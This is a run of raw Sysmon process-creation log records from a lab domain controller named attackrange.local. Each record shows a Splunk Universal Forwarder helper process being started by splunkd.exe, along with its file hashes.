AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000036312Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:35:20.852{A8622C2F-4F28-6078-F206-00000000AE01}7144C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000036303Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:35:20.181{A8622C2F-4F28-6078-F106-00000000AE01}3472C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000036293Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:35:18.282{A8622C2F-4F26-6078-F006-00000000AE01}5936C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000036282Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:35:17.616{A8622C2F-4F25-6078-EF06-00000000AE01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000036273Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:35:16.949{A8622C2F-4F24-6078-EE06-00000000AE01}6808C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000036190Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:34:22.927{A8622C2F-4EEE-6078-ED06-00000000AE01}4568C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000036171Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:34:21.581{A8622C2F-4EED-6078-EC06-00000000AE01}1824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000036162Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:34:20.908{A8622C2F-4EEC-6078-EB06-00000000AE01}5516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000036152Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:34:20.237{A8622C2F-4EEC-6078-EA06-00000000AE01}5204C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000036142Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:34:18.408{A8622C2F-4EEA-6078-E906-00000000AE01}4816C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000036132Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:34:17.736{A8622C2F-4EE9-6078-E806-00000000AE01}6064C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000036122Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:34:17.081{A8622C2F-4EE9-6078-E706-00000000AE01}7140C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000036002Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:33:22.915{A8622C2F-4EB2-6078-E606-00000000AE01}6272C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035987Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:33:21.582{A8622C2F-4EB1-6078-E506-00000000AE01}7044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035977Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:33:20.900{A8622C2F-4EB0-6078-E406-00000000AE01}828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035968Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:33:20.234{A8622C2F-4EB0-6078-E306-00000000AE01}6428C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035948Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:33:18.404{A8622C2F-4EAE-6078-E206-00000000AE01}3172C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035936Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:33:17.731{A8622C2F-4EAD-6078-E106-00000000AE01}5928C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035928Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:33:17.073{A8622C2F-4EAD-6078-E006-00000000AE01}2280C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035792Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:32:22.906{A8622C2F-4E76-6078-DF06-00000000AE01}4264C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035780Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:32:21.558{A8622C2F-4E75-6078-DE06-00000000AE01}6464C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035770Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:32:20.886{A8622C2F-4E74-6078-DD06-00000000AE01}6736C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035761Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:32:20.216{A8622C2F-4E74-6078-DC06-00000000AE01}6256C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035750Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:32:18.395{A8622C2F-4E72-6078-DB06-00000000AE01}932C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035740Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:32:17.731{A8622C2F-4E71-6078-DA06-00000000AE01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035730Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:32:17.056{A8622C2F-4E71-6078-D906-00000000AE01}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035648Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:31:22.888{A8622C2F-4E3A-6078-D806-00000000AE01}2424C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035634Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:31:21.570{A8622C2F-4E39-6078-D706-00000000AE01}1056C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035624Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:31:20.888{A8622C2F-4E38-6078-D606-00000000AE01}7060C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035615Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:31:20.211{A8622C2F-4E38-6078-D506-00000000AE01}4424C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035604Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:31:18.409{A8622C2F-4E36-6078-D406-00000000AE01}7036C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035593Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:31:17.744{A8622C2F-4E35-6078-D306-00000000AE01}4384C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000035585Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:31:17.068{A8622C2F-4E35-6078-D206-00000000AE01}4264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program 